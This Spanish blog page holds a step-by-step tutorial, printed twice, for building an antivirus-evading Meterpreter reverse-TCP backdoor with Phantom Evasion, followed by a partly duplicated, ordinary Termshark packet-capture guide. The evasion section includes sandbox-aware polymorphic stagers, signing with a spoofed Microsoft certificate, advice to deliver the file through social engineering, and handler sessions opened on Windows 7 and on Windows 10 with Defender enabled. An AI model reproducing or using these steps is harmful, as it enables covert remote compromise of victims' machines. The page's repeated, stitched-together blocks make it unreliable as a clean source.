viernes, 29 de noviembre de 2019

Cómo evadir protección antivirus con Phantom Payloads

Metasploit es la herramienta más popular utilizada en pruebas de penetración. Metasploit intenta encontrar debilidades en su red local antes de que los hackers lo hagan. A continuación, presentaremos la herramienta más utilizada por los atacantes para probar la seguridad de su sistema operativo.
En Kali Linux, Metasploit estaa instalada por defecto e incluye una gran cantidad de cargas útiles (payloads) que se utilizan para generar ejecutables maliciosos y hackear plataformas. Pero hoy le mostraremos una herramienta llamada Phantom Evasion que se utiliza para generar ejecutables a prueba de detección usando la carga útil msfvenom. Según el desarrollador, el objetivo principal de Phantom Evasion es evitar que las soluciones antivirus detecten las cargas útiles.
  • Phantom Evasion se ha probado en Kali Linux 2018.4 (amd64)
  • Para clonar, escriba git clone https://github.com/oddcod3/Phantom-Evasion.git
  • Escriba cd Phantom-EvasionEscriba chmod u+x phantom-evasion.py
  • Escriba python3 phantom-evasion.py
  • Cuando se ejecuta por primera vez, puede aparecer algún error, pero la herramienta funcionará perfectamente
                     _                 _
                 _ __ | |__   __ _ _ __ | |_ ___  _ __ ___
                | '_ \| '_ \ / _` | '_ \| __/ _ \| '_ ` _ \
                | |_) | | | | (_| | | | | || (_) | | | | | |
                | .__/|_| |_|\__,_|_| |_|\__\___/|_| |_| |_|
                |_|   / _ \ \ / / _` / __| |/ _ \| '_ \
                     |  __/\ V / (_| \__ \ | (_) | | | |
                      \___| \_/ \__,_|___/_|\___/|_| |_|
                                                        v2.0.1
    =====================================================================
  ||        [MAIN MENU]:             ||                                  ||
  ||                                 ||                                  ||
  ||    [1]  Windows modules         ||   [5]  Universal modules         ||
  ||                                 ||                                  ||
  ||    [2]  Linux modules           ||   [6]  Post-Exploitation modules ||
  ||                                 ||                                  ||
  ||    [3]  OSX modules             ||   [7]  Update check              ||
  ||                                 ||                                  ||
  ||    [4]  Android modules         ||   [0]  Exit                      ||
  ||                                 ||                                  ||
    =====================================================================

[>] Please insert option:
  • Escriba 1
[>] Please insert option: 1
  • Escriba 2
 [+] WINDOWS MODULES INDEX:
 [1]  Shellcode Injection
 [2]  Stager
 [3]  Powershell / Wine-pyinstaller
 [0]  Back
 [>] Please insert option: 2
  • Escriba 1
[+] WINDOWS STAGER MODULES:
 [1]  X86 stagers
 [2]  X64 stagers
 [0]  Back
 [>] Please insert option: 1
  • Escriba 3
 [+] WINDOWS x86 STAGER MODULES:
 [1]  C meterpreter/reverse_TCP VirtualAlloc                           (C)
 [2]  C meterpreter/reverse_TCP VirtualAlloc NoDirectCall GPAGMH       (C)
 [3]  C meterpreter/reverse_TCP HeapAlloc                              (C)
 [4]  C meterpreter/reverse_TCP HeapAlloc NoDirectCall GPAGMH          (C)
 [5]  C meterpreter/reverse_HTTP VirtualAlloc                          (C)
 [6]  C meterpreter/reverse_HTTP VirtualAlloc NoDirectCall GPAGMH      (C)
 [7]  C meterpreter/reverse_HTTP HeapAlloc                             (C)
 [8]  C meterpreter/reverse_HTTP HeapAlloc NoDirectCall GPAGMH         (C)
 [9]  C meterpreter/reverse_HTTPS VirtualAlloc                         (C)
 [10] C meterpreter/reverse_HTTPS VirtualAlloc NoDirectCall GPAGMH     (C)
 [11] C meterpreter/reverse_HTTPS HeapAlloc                            (C)
 [12] C meterpreter/reverse_HTTPS HeapAlloc NoDirectCall GPAGMH        (C)
 [0]  Back
  • Después de seleccionar cualquier carga útil, se mostrará una descripción de la carga y en qué extensión se construirá
[+] MODULE DESCRIPTION:
 This Module generate and compile
   32bit pure c meterpreter reverse tcp stagers.
   Require msfconsole multi/handler listener
   with payload set to windows/meterpreter/reverse_tcp
 [>] Memory allocation type: HEAP
 [>] TYPE: TCP
   [>] STATIC EVASION:
   Polymorphic source code
   [>] DYNAMIC EVASION:
   Resource consumption technique
   Sandbox-aware code
   [>] AUTOCOMPILE(cross platform): to EXE file
 Press Enter to continue:
  • Escriba 192.168.1.6 (dirección IP del atacante)
[>] Please insert LHOST: 192.168.1.6
  • Escriba 433 (puerto del atacante)
[>] Please insert LPORT: 443
  • Luego ingrese el nombre del archivo: file
[>] Please insert output filename: file
  • Escriba n para crear un solo proceso en la computadora de destino. Por lo tanto, cada vez habrá menos posibilidades de ser atrapado por el antivirus
[>] Spawn Multiple Processes:
 During target-side execution this will cause to spawn a maximum of 4 processes
 consequentialy.
 Only the last spawned process will reach the malicious section of code
 while the other decoy processes spawned before will executes only random junk code
 [>] Add multiple processes behaviour?(y/n): n
  • Escriba y
[>] Generating C meterpreter stager
 [>] Compiling…
 [>] Strip
 strip is a GNU utility to "strip" symbols from object files.
 This is useful for minimizing their file size, streamlining them for distribution.
 It can also be useful for making it more difficult to reverse-engineer the compiled code.
 (Lower rate of detection)
 [>] Strip executable? (y/n): y
  • La consulta anterior reducirá el tamaño del archivo malicioso
  • Escriba y
[>] Sign Executable
 Online Certificate spoofer & Executabe signer (Lower rate of detection)
 [>] Sign executable? (y/n): y
  • La consulta anterior firmará el archivo malicioso con el certificado predeterminado que viene con Phantom Evasion
  • Puede usar su propio certificado o usarlo con el certificado de Microsoft que viene con la Phantom Evasion
  • Escriba y
  • Escriba 1
Certificates directory is not empty , use already existing certificate? (y/n): y
 [1] www.microsoft.com
 [2] Create new certificate
 [>] Select a Certificate or create a new one: 1
  • Escriba 1
[>] Select a Certificate or create a new one: 1

[>] Insert sign software description (default: Notepad Benchmark Util):
 [>] Signing file1.exe with osslsigncode…
 [>] Succeeded
 [<>] File saved in Phantom-Evasion folder
  • Después de crear un código malicioso, envíe el archivo al objetivo. Puede usar cualquier variante de ingeniería social para llegar a su objetivo
Probar en plataformas Windows
  • Para las pruebas, estamos usando Windows 7 (32 bits) con Windows Defender desactivado
  • Abra el archivo ejecutable presionando enter
  • Para comprobar la carga útil puede usar el controlador múltiple de metasploit que viene preinstalado en Kali Linux. Abra otro terminal y escriba msfconsole
  • Escriba use multi/handler
msf > use multi/handler
  • Escriba LHOST 192.168.1.6 (igual que se ingresó en Phantom Evasion)
  • Escriba LPORT 443 (igual que se ingresó en Phantom Evasion)
  • Escriba show options
msf exploit(multi/handler) > set LHOST 192.168.1.6
 LHOST => 192.168.1.6
 msf exploit(multi/handler) > set LPORT 443
 LPORT => 443
 msf exploit(multi/handler) > show options
 Module options (exploit/multi/handler):
 Name  Current Setting  Required  Description
    ----  ---------------  --------  -----------
 Payload options (windows/meterpreter/reverse_tcp):
 Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
    LHOST     192.168.1.6      yes       The listen address (an interface may be specified)
    LPORT     443              yes       The listen port
 Exploit target:
 Id  Name
    --  ----
    0   Wildcard Target
  • Escriba run
msf exploit(multi/handler) > run
  • Como malicioso ya se ha iniciado en Windows 7 Professional 32 Bit. Después de escribir, se creará una nueva sesión entre los atacantes y las máquinas de destino
  • Escriba sysinfo para verificar los detalles del equipo de destino
[] Started reverse TCP handler on 192.168.1.6:443 [] Sending stage (179779 bytes) to 192.168.1.9
 [*] Meterpreter session 1 opened (192.168.1.6:443 -> 192.168.1.9:49250) at 2019-03-04 00:34:27 -0500
 meterpreter > sysinfo
 Computer        : WIN-31VSBP3FUQT
 OS              : Windows 7 (Build 7601, Service Pack 1).
 Architecture    : x86
 System Language : en_US
 Domain          : WORKGROUP
 Logged On Users : 1
 Meterpreter     : x86/windows
 meterpreter >
  • Ahora puede manipular al objetivo utilizando el shell de comandos de meterpreter
  • Ahora, para realizar más pruebas, hemos utilizado Windows 10 Enterprise 1809 (x64) con Windows Defender habilitado
  • Abra el ejecutable malicioso en la máquina de Windows 10. A medida que abra el archivo ejecutable, se creará una nueva sesión en multi/handler
  • Escriba sysinfo para verificar los detalles del equipo de destino
[] Started reverse TCP handler on 192.168.1.6:443 [] Sending stage (179779 bytes) to 192.168.1.105
 [*] Meterpreter session 2 opened (192.168.1.6:443 -> 192.168.1.105:49753) at 2019-03-04 02:26:30 -0500
 meterpreter > sysinfo
 Computer        : DESKTOP-I9LEAU8
 OS              : Windows 10 (Build 17758).
 Architecture    : x64
 System Language : en_US
 Domain          : WORKGROUP
 Logged On Users : 2
 Meterpreter     : x86/windows
  • Ahora puede manipular el objetivo usando el shell de comandos de meterpreter
Según investigadores en seguridad en redes del Instituto Internacional de Seguridad Cibernética, esta herramienta se puede utilizar para generar una carga útil de nivel inicial que se puede personalizar aún más para evitar otros antivirus.

Cómo evadir protección antivirus con Phantom Payloads

Cómo evadir protección antivirus con Phantom Payloads

Metasploit es la herramienta más popular utilizada en pruebas de penetración. Metasploit intenta encontrar debilidades en su red local antes de que los hackers lo hagan. A continuación, presentaremos la herramienta más utilizada por los atacantes para probar la seguridad de su sistema operativo.
En Kali Linux, Metasploit estaa instalada por defecto e incluye una gran cantidad de cargas útiles (payloads) que se utilizan para generar ejecutables maliciosos y hackear plataformas. Pero hoy le mostraremos una herramienta llamada Phantom Evasion que se utiliza para generar ejecutables a prueba de detección usando la carga útil msfvenom. Según el desarrollador, el objetivo principal de Phantom Evasion es evitar que las soluciones antivirus detecten las cargas útiles.
  • Phantom Evasion se ha probado en Kali Linux 2018.4 (amd64)
  • Para clonar, escriba git clone https://github.com/oddcod3/Phantom-Evasion.git
  • Escriba cd Phantom-EvasionEscriba chmod u+x phantom-evasion.py
  • Escriba python3 phantom-evasion.py
  • Cuando se ejecuta por primera vez, puede aparecer algún error, pero la herramienta funcionará perfectamente
                     _                 _
                 _ __ | |__   __ _ _ __ | |_ ___  _ __ ___
                | '_ \| '_ \ / _` | '_ \| __/ _ \| '_ ` _ \
                | |_) | | | | (_| | | | | || (_) | | | | | |
                | .__/|_| |_|\__,_|_| |_|\__\___/|_| |_| |_|
                |_|   / _ \ \ / / _` / __| |/ _ \| '_ \
                     |  __/\ V / (_| \__ \ | (_) | | | |
                      \___| \_/ \__,_|___/_|\___/|_| |_|
                                                        v2.0.1
    =====================================================================
  ||        [MAIN MENU]:             ||                                  ||
  ||                                 ||                                  ||
  ||    [1]  Windows modules         ||   [5]  Universal modules         ||
  ||                                 ||                                  ||
  ||    [2]  Linux modules           ||   [6]  Post-Exploitation modules ||
  ||                                 ||                                  ||
  ||    [3]  OSX modules             ||   [7]  Update check              ||
  ||                                 ||                                  ||
  ||    [4]  Android modules         ||   [0]  Exit                      ||
  ||                                 ||                                  ||
    =====================================================================

[>] Please insert option:
  • Escriba 1
[>] Please insert option: 1
  • Escriba 2
 [+] WINDOWS MODULES INDEX:
 [1]  Shellcode Injection
 [2]  Stager
 [3]  Powershell / Wine-pyinstaller
 [0]  Back
 [>] Please insert option: 2
  • Escriba 1
[+] WINDOWS STAGER MODULES:
 [1]  X86 stagers
 [2]  X64 stagers
 [0]  Back
 [>] Please insert option: 1
  • Escriba 3
 [+] WINDOWS x86 STAGER MODULES:
 [1]  C meterpreter/reverse_TCP VirtualAlloc                           (C)
 [2]  C meterpreter/reverse_TCP VirtualAlloc NoDirectCall GPAGMH       (C)
 [3]  C meterpreter/reverse_TCP HeapAlloc                              (C)
 [4]  C meterpreter/reverse_TCP HeapAlloc NoDirectCall GPAGMH          (C)
 [5]  C meterpreter/reverse_HTTP VirtualAlloc                          (C)
 [6]  C meterpreter/reverse_HTTP VirtualAlloc NoDirectCall GPAGMH      (C)
 [7]  C meterpreter/reverse_HTTP HeapAlloc                             (C)
 [8]  C meterpreter/reverse_HTTP HeapAlloc NoDirectCall GPAGMH         (C)
 [9]  C meterpreter/reverse_HTTPS VirtualAlloc                         (C)
 [10] C meterpreter/reverse_HTTPS VirtualAlloc NoDirectCall GPAGMH     (C)
 [11] C meterpreter/reverse_HTTPS HeapAlloc                            (C)
 [12] C meterpreter/reverse_HTTPS HeapAlloc NoDirectCall GPAGMH        (C)
 [0]  Back
  • Después de seleccionar cualquier carga útil, se mostrará una descripción de la carga y en qué extensión se construirá
[+] MODULE DESCRIPTION:
 This Module generate and compile
   32bit pure c meterpreter reverse tcp stagers.
   Require msfconsole multi/handler listener
   with payload set to windows/meterpreter/reverse_tcp
 [>] Memory allocation type: HEAP
 [>] TYPE: TCP
   [>] STATIC EVASION:
   Polymorphic source code
   [>] DYNAMIC EVASION:
   Resource consumption technique
   Sandbox-aware code
   [>] AUTOCOMPILE(cross platform): to EXE file
 Press Enter to continue:
  • Escriba 192.168.1.6 (dirección IP del atacante)
[>] Please insert LHOST: 192.168.1.6
  • Escriba 433 (puerto del atacante)
[>] Please insert LPORT: 443
  • Luego ingrese el nombre del archivo: file
[>] Please insert output filename: file
  • Escriba n para crear un solo proceso en la computadora de destino. Por lo tanto, cada vez habrá menos posibilidades de ser atrapado por el antivirus
[>] Spawn Multiple Processes:
 During target-side execution this will cause to spawn a maximum of 4 processes
 consequentialy.
 Only the last spawned process will reach the malicious section of code
 while the other decoy processes spawned before will executes only random junk code
 [>] Add multiple processes behaviour?(y/n): n
  • Escriba y
[>] Generating C meterpreter stager
 [>] Compiling…
 [>] Strip
 strip is a GNU utility to "strip" symbols from object files.
 This is useful for minimizing their file size, streamlining them for distribution.
 It can also be useful for making it more difficult to reverse-engineer the compiled code.
 (Lower rate of detection)
 [>] Strip executable? (y/n): y
  • La consulta anterior reducirá el tamaño del archivo malicioso
  • Escriba y
[>] Sign Executable
 Online Certificate spoofer & Executabe signer (Lower rate of detection)
 [>] Sign executable? (y/n): y
  • La consulta anterior firmará el archivo malicioso con el certificado predeterminado que viene con Phantom Evasion
  • Puede usar su propio certificado o usarlo con el certificado de Microsoft que viene con la Phantom Evasion
  • Escriba y
  • Escriba 1
Certificates directory is not empty , use already existing certificate? (y/n): y
 [1] www.microsoft.com
 [2] Create new certificate
 [>] Select a Certificate or create a new one: 1
  • Escriba 1
[>] Select a Certificate or create a new one: 1

[>] Insert sign software description (default: Notepad Benchmark Util):
 [>] Signing file1.exe with osslsigncode…
 [>] Succeeded
 [<>] File saved in Phantom-Evasion folder
  • Después de crear un código malicioso, envíe el archivo al objetivo. Puede usar cualquier variante de ingeniería social para llegar a su objetivo
Probar en plataformas Windows
  • Para las pruebas, estamos usando Windows 7 (32 bits) con Windows Defender desactivado
  • Abra el archivo ejecutable presionando enter
  • Para comprobar la carga útil puede usar el controlador múltiple de metasploit que viene preinstalado en Kali Linux. Abra otro terminal y escriba msfconsole
  • Escriba use multi/handler
msf > use multi/handler
  • Escriba LHOST 192.168.1.6 (igual que se ingresó en Phantom Evasion)
  • Escriba LPORT 443 (igual que se ingresó en Phantom Evasion)
  • Escriba show options
msf exploit(multi/handler) > set LHOST 192.168.1.6
 LHOST => 192.168.1.6
 msf exploit(multi/handler) > set LPORT 443
 LPORT => 443
 msf exploit(multi/handler) > show options
 Module options (exploit/multi/handler):
 Name  Current Setting  Required  Description
    ----  ---------------  --------  -----------
 Payload options (windows/meterpreter/reverse_tcp):
 Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
    LHOST     192.168.1.6      yes       The listen address (an interface may be specified)
    LPORT     443              yes       The listen port
 Exploit target:
 Id  Name
    --  ----
    0   Wildcard Target
  • Escriba run
msf exploit(multi/handler) > run
  • Como malicioso ya se ha iniciado en Windows 7 Professional 32 Bit. Después de escribir, se creará una nueva sesión entre los atacantes y las máquinas de destino
  • Escriba sysinfo para verificar los detalles del equipo de destino
[] Started reverse TCP handler on 192.168.1.6:443 [] Sending stage (179779 bytes) to 192.168.1.9
 [*] Meterpreter session 1 opened (192.168.1.6:443 -> 192.168.1.9:49250) at 2019-03-04 00:34:27 -0500
 meterpreter > sysinfo
 Computer        : WIN-31VSBP3FUQT
 OS              : Windows 7 (Build 7601, Service Pack 1).
 Architecture    : x86
 System Language : en_US
 Domain          : WORKGROUP
 Logged On Users : 1
 Meterpreter     : x86/windows
 meterpreter >
  • Ahora puede manipular al objetivo utilizando el shell de comandos de meterpreter
  • Ahora, para realizar más pruebas, hemos utilizado Windows 10 Enterprise 1809 (x64) con Windows Defender habilitado
  • Abra el ejecutable malicioso en la máquina de Windows 10. A medida que abra el archivo ejecutable, se creará una nueva sesión en multi/handler
  • Escriba sysinfo para verificar los detalles del equipo de destino
[] Started reverse TCP handler on 192.168.1.6:443 [] Sending stage (179779 bytes) to 192.168.1.105
 [*] Meterpreter session 2 opened (192.168.1.6:443 -> 192.168.1.105:49753) at 2019-03-04 02:26:30 -0500
 meterpreter > sysinfo
 Computer        : DESKTOP-I9LEAU8
 OS              : Windows 10 (Build 17758).
 Architecture    : x64
 System Language : en_US
 Domain          : WORKGROUP
 Logged On Users : 2
 Meterpreter     : x86/windows
  • Ahora puede manipular el objetivo usando el shell de comandos de meterpreter
Según investigadores en seguridad en redes del Instituto Internacional de Seguridad Cibernética, esta herramienta se puede utilizar para generar una carga útil de nivel inicial que se puede personalizar aún más para evitar otros antivirus.

Un analizador de paquetes ligero y fácil de usar | Tshark


Hay muchas herramientas utilizadas por los administradores de red para escanear. Se realiza un escaneo de redes continuo de la red para verificar si hay alguna actividad maliciosa o no. Probablemente, Wireshark es la herramienta más utilizada en los cursos de hacking ético ofrecidos por el Instituto Internacional de Seguridad Cibernética (IICS) para verificar la actividad de la red.
Acorde a investigadores de hacking ético del IICS, Tshark se utiliza en pruebas de redes. Los paquetes de datos juegan un papel importante en la transmisión de la red. Hay muchos analizadores de paquetes que son utilizados por el administrador de la red para buscar paquetes de datos. Hoy analizamos otro analizador de paquetes de datos llamado Termshark. Termshark es una versión terminal de Wireshark escrita en GO-LANG GO.
Funciones
  • Analiza cada paquete usando vistas de wirehark. Filtra pcaps o capturas en vivo usando los filtros de visualización de Wireshark
  • Copia rangos de paquetes al portapapeles desde el terminal escrito en Golang, compila en un solo ejecutable en cada plataforma: descargas disponibles para Linux (+ termux), macOS, FreeBSD y Windows
  • Lee archivos pcap o busca interfaces en vivo (donde está permitido tshark)
Instalación
  • Para las pruebas se usó Kali Linux 2019.1 amd64. Antes de instalar Termshark, GO debe estar instalado. Escriba sudo apt-get update && sudo apt-get install golang
  • A continuación, escriba echo $GOPATH
  • Escriba GOPATH=/root/go/ para establecer la ruta GO.
  • Escriba sudo apt-get install tshark
  • Ahora puede descargar tshark desde Github con: git clone https://github.com/gcla/termshark.git
  • Escriba go get github.com/gcla/termshark/cmd/termshark
  • puede usar la precompilación de termshark desde: https://github.com/gcla/termshark/releases
  • wgethttps://github.com/gcla/termshark/releases/download/v1.0.0/termshark_1.0.0_linux_x64.tar.gz
  • Escriba tar -xvzf termshark_1.0.0_linux_x64.tar.gz
  • Escriba cd termshark_1.0.0_linux_x64
  • Escriba ./termshark: esta precompilación ofrece una interfaz GUI basada en línea de comandos
  • Primero analizaremos termshark con la línea de comandos y luego mostraremos la interfaz gráfica de usuario basada en la línea de comandos
Uso
  • Escriba tshark -h
  • -h muestra el menú de ayuda
root@kali:~/Downloads# tshark -h
 Running as user "root" and group "root". This could be dangerous.
 tshark: option requires an argument -- 'f'
 Usage: tshark [options] …
 Capture interface:
   -i            name or idx of interface (def: first non-loopback)
   -f       packet filter in libpcap filter syntax
   -s              packet snapshot length (def: appropriate maximum)
   -p                       don't capture in promiscuous mode
   -I                       capture in monitor mode, if available
   -B          size of kernel buffer (def: 2MB)
   -y 
           link layer type (def: first appropriate)
   --time-stamp-type  timestamp method for interface
   -D                       print list of interfaces and exit
   -L                       print list of link-layer types of iface and exit
   --list-time-stamp-types  print list of timestamp types for iface and exit
  • Escriba tshark -i wlan0
  • -i se utiliza para asignar interfaz de red
  • Para comprobar la interfaz de red, escriba iwconfig
root@kali:~/go# iwconfig
 wlan0     IEEE 802.11  ESSID:"H###W##"
           Mode:Managed  Frequency:2.457 GHz  Access Point: ##:##:##:8D:##:E4
           Bit Rate=65 Mb/s   Tx-Power=20 dBm
           Retry short limit:7   RTS thr=2347 B   Fragment thr:off
           Encryption key:off
           Power Management:on
           Link Quality=67/70  Signal level=-43 dBm
           Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
           Tx excessive retries:0  Invalid misc:74   Missed beacon:0
  • Escriba tshark -i wlan0
  • -i se utiliza para asignar interfaz de red
  • Esta consulta comenzará a capturar paquetes locales
root@kali:~/Downloads# tshark -i wlan0
 Running as user "root" and group "root". This could be dangerous.
 Capturing on 'wlan0'
     1 0.000000000  192.168.1.3 → 192.168.1.10 TCP 60 3047 → 22 [ACK] Seq=1 Ack=1 Win=253 Len=0
     2 0.589627876 192.168.1.10 → 192.168.1.3  SSH 214 Server: Encrypted packet (len=160)
     3 0.799904360  192.168.1.3 → 192.168.1.10 TCP 60 3047 → 22 [ACK] Seq=1 Ack=161 Win=252 Len=0
     4 1.103457921 192.168.1.10 → 192.168.1.3  SSH 310 Server: Encrypted packet (len=256)
     5 1.302880225  192.168.1.3 → 192.168.1.10 TCP 60 3047 → 22 [ACK] Seq=1 Ack=417 Win=251 Len=0
     6 1.615306911 192.168.1.10 → 192.168.1.3  SSH 310 Server: Encrypted packet (len=256)
     7 1.815734300  192.168.1.3 → 192.168.1.10 TCP 60 3047 → 22 [ACK] Seq=1 Ack=673 Win=256 Len=0
     8 2.127450002 192.168.1.10 → 192.168.1.3  SSH 310 Server: Encrypted packet (len=256)
     9 2.335133706  192.168.1.3 → 192.168.1.10 TCP 60 3047 → 22 [ACK] Seq=1 Ack=929 Win=255 Len=0
    10 2.639471642 192.168.1.10 → 192.168.1.3  SSH 310 Server: Encrypted packet (len=256)
    11 2.850235384  192.168.1.3 → 192.168.1.10 TCP 60 3047 → 22 [ACK] Seq=1 Ack=1185 Win=254 Len=0
    12 3.151440488 192.168.1.10 → 192.168.1.3  SSH 310 Server: Encrypted packet (len=256)
    13 3.360222085  192.168.1.3 → 192.168.1.10 TCP 60 3047 → 22 [ACK] Seq=1 Ack=1441 Win=253 Len=0
    14 3.539527427  192.168.1.3 → 239.255.255.250 SSDP 216 M-SEARCH * HTTP/1.1
  • La consulta anterior ha capturado paquetes TCP con secuencia y confirmación. El número de secuencia se utiliza para dividir los datos grandes en uno más pequeño. Mencionando cada dirección IP con cada protocolo de red
  • El campo Número de acuse de recibo contiene el siguiente número de secuencia que el remitente del acuse de recibo espera recibir
  • El análisis completo del número de secuencia y el número de confirmación es una parte interesante de los cursos de piratería ética ofrecidos por el Instituto Internacional de Seguridad Cibernética en Delhi, India
Capturar el paquete deseado de datos
  • Escriba tshark -i wlan0 UDP
  • -i se utiliza para mencionar la interfaz de red. wlan0 es nuestra interfaz de red
  • tshark capturará solo paquetes UDP
root@kali:~# tshark -i wlan0 udp
 0Running as user "root" and group "root". This could be dangerous.
 Capturing on 'wlan0'
     1 0.000000000 192.168.1.10 → 192.168.1.255 BROWSER 243 Host Announcement DESKTOP-382RT0N, Workstation, Server, NT Workstation
     2 10.047894475  192.168.1.6 → 192.168.1.1  DNS 71 Standard query 0x575b A youtube.com
     3 10.047935767  192.168.1.6 → 192.168.1.1  DNS 71 Standard query 0x1367 AAAA youtube.com
     4 10.068684885  192.168.1.1 → 192.168.1.6  DNS 314 Standard query response 0x575b A youtube.com A 216.58.200.174 NS ns3.google.com NS ns4.google.com NS ns2.google.com NS ns1.google.com A 216.239.32.10 A 216.239.34.10 A 216.239.36.10 A 216.239.38.10 AAAA 2001:4860:4802:32::a AAAA 2001:4860:4802:36::a AAAA 2001:4860:4802:38::a
     5 10.136276096  192.168.1.1 → 192.168.1.6  DNS 326 Standard query response 0x1367 AAAA youtube.com AAAA 2404:6800:4002:811::200e NS ns1.google.com NS ns2.google.com NS ns4.google.com NS ns3.google.com A 216.239.32.10 A 216.239.34.10 A 216.239.36.10 A 216.239.38.10 AAAA 2001:4860:4802:32::a AAAA 2001:4860:4802:36::a AAAA 2001:4860:4802:38::a
     6 10.352876669  192.168.1.6 → 192.168.1.1  DNS 73 Standard query 0x05c2 A ocsp.pki.goog
     7 10.358805848  192.168.1.1 → 192.168.1.6  DNS 344 Standard query response 0x05c2 A ocsp.pki.goog CNAME pki-goog.l.google.com A 172.217.166.3 NS ns1.google.com NS ns2.google.com NS ns4.google.com NS ns3.google.com A 216.239.32.10 A 216.239.34.10 A 216.239.36.10 A 216.239.38.10 AAAA 2001:4860:4802:32::a AAAA 2001:4860:4802:36::a AAAA 2001:4860:4802:38::a
     8 10.556555958  192.168.1.6 → 192.168.1.1  DNS 75 Standard query 0x4d56 A www.youtube.com
     9 10.556594357  192.168.1.6 → 192.168.1.1  DNS 75 Standard query 0xe65e AAAA www.youtube.com
  • UDP (User Datagram Protocol) se usa para enviar mensajes cortos. El tráfico de la red UDP se organiza en forma de datagramas. Su protocolo no confiable y sin conexión
  • La consulta anterior ha recopilado registros diferidos después de asignar el protocolo UDP. En primer lugar, muestra la solicitud se envía al navegador. Luego muestra la solicitud de DNS (Sistema de nombres de dominio) para la URL (youtube.com) con la dirección IP de 216.58.200.174. También puede comprobar lo mismo con nslookup
  • Uso del Servidor de nombres (NS) ns1.google.com con una consulta de DNS estándar
Interfaz GUI basada en la línea de comandos de Termshark
  • Escriba cd termshark_1.0.0_linux_x64
  • Escriba ./termshark -i wlan0
  • -i se utiliza para mencionar la interfaz de red. wlan0 es nuestra interfaz de red
  • Presione el botón ? en el teclado de su computadora
  • La consulta anterior muestra los paquetes capturados y el menú de ayuda
Filtrado de paquetes con GUI basada en línea de comandos
  • Escriba ./termshark -i wlan0
  • -i se utiliza para mencionar la interfaz de red. wlan0 es nuestra interfaz de red.
  • Después de que termshark comenzará a capturar el paquete. En el cuadro de diálogo Filtro, puede ingresar cualquier protocolo. Aquí hemos escrito UDP. Después de escribir UDP, haga clic en Aplicar para capturar solo paquetes UDP
  • La salida anterior muestra la transmisión de paquetes, mostrando la dirección IP de origen y destino con la longitud del paquete. A continuación verás cómo funciona UDP
  • Cada paquete muestra con el tiempo necesario para la transmisión
  • La apertura de los primeros cuadros de paquetes muestra que el paquete es de 216 bytes. Luego muestra el tiempo de llegada y el cambio de tiempo del paquete
  • El análisis adicional muestra la versión de solicitud y el agente de usuario utilizado en la transferencia de paquetes de datos
Sólo ver transmisión de paquetes
  • Escriba ./termshark -i wlan
  • -i se utiliza para mencionar la interfaz de red. wlan0 es nuestra interfaz de red
  • Presione el botón / en el teclado para ver solo la transmisión de paquetes
  • La salida anterior muestra la transmisión de paquetes en la red interna. Puede ver paquetes de transacciones entre dos direcciones IPv4
  • Luego muestra el tamaño de paquete de Ethernet encriptado len = 64. Con Seq = 1 y cambiando el reconocimiento
Abrir archivos PCAP
  • Ahora, muchas veces recibe el archivo pcap durante sus proyectos con el Instituto Internacional de Seguridad Cibernética para analizar el flujo de paquetes y realizar actividades forenses cibernéticas en el archivo pcap
  • Puede abrir cualquier archivo guardado desde cualquier otro analizador de red. Aquí hemos abierto otro archivo pcap que se guardó después de capturar la red interna con wireshark
  • Para abrir archivos pcap., escriba ./termshark -r wlan0-299382837.pcap
  • -r se usa para mencionar el archivo pcap. 299382837 es un archivo pcap
  • La captura de pantalla de arriba muestra la transmisión de paquetes de los protocolos de red UDP e ICMP. Además, muestra la transmisión de paquetes utilizando HTTP 1.1 con el tiempo que tomó transferir paquetes desde la dirección IP de origen a destino

Un analizador de paquetes ligero y fácil de usar | Tshark

Un analizador de paquetes ligero y fácil de usar | Tshark


Hay muchas herramientas utilizadas por los administradores de red para escanear. Se realiza un escaneo de redes continuo de la red para verificar si hay alguna actividad maliciosa o no. Probablemente, Wireshark es la herramienta más utilizada en los cursos de hacking ético ofrecidos por el Instituto Internacional de Seguridad Cibernética (IICS) para verificar la actividad de la red.
Acorde a investigadores de hacking ético del IICS, Tshark se utiliza en pruebas de redes. Los paquetes de datos juegan un papel importante en la transmisión de la red. Hay muchos analizadores de paquetes que son utilizados por el administrador de la red para buscar paquetes de datos. Hoy analizamos otro analizador de paquetes de datos llamado Termshark. Termshark es una versión terminal de Wireshark escrita en GO-LANG GO.
Funciones
  • Analiza cada paquete usando vistas de wirehark. Filtra pcaps o capturas en vivo usando los filtros de visualización de Wireshark
  • Copia rangos de paquetes al portapapeles desde el terminal escrito en Golang, compila en un solo ejecutable en cada plataforma: descargas disponibles para Linux (+ termux), macOS, FreeBSD y Windows
  • Lee archivos pcap o busca interfaces en vivo (donde está permitido tshark)
Instalación
  • Para las pruebas se usó Kali Linux 2019.1 amd64. Antes de instalar Termshark, GO debe estar instalado. Escriba sudo apt-get update && sudo apt-get install golang
  • A continuación, escriba echo $GOPATH
  • Escriba GOPATH=/root/go/ para establecer la ruta GO.
  • Escriba sudo apt-get install tshark
  • Ahora puede descargar tshark desde Github con: git clone https://github.com/gcla/termshark.git
  • Escriba go get github.com/gcla/termshark/cmd/termshark
  • puede usar la precompilación de termshark desde: https://github.com/gcla/termshark/releases
  • wgethttps://github.com/gcla/termshark/releases/download/v1.0.0/termshark_1.0.0_linux_x64.tar.gz
  • Escriba tar -xvzf termshark_1.0.0_linux_x64.tar.gz
  • Escriba cd termshark_1.0.0_linux_x64
  • Escriba ./termshark: esta precompilación ofrece una interfaz GUI basada en línea de comandos
  • Primero analizaremos termshark con la línea de comandos y luego mostraremos la interfaz gráfica de usuario basada en la línea de comandos
Uso
  • Escriba tshark -h
  • -h muestra el menú de ayuda
root@kali:~/Downloads# tshark -h
 Running as user "root" and group "root". This could be dangerous.
 tshark: option requires an argument -- 'f'
 Usage: tshark [options] …
 Capture interface:
   -i            name or idx of interface (def: first non-loopback)
   -f       packet filter in libpcap filter syntax
   -s              packet snapshot length (def: appropriate maximum)
   -p                       don't capture in promiscuous mode
   -I                       capture in monitor mode, if available
   -B          size of kernel buffer (def: 2MB)
   -y 
           link layer type (def: first appropriate)
   --time-stamp-type  timestamp method for interface
   -D                       print list of interfaces and exit
   -L                       print list of link-layer types of iface and exit
   --list-time-stamp-types  print list of timestamp types for iface and exit
  • Escriba tshark -i wlan0
  • -i se utiliza para asignar interfaz de red
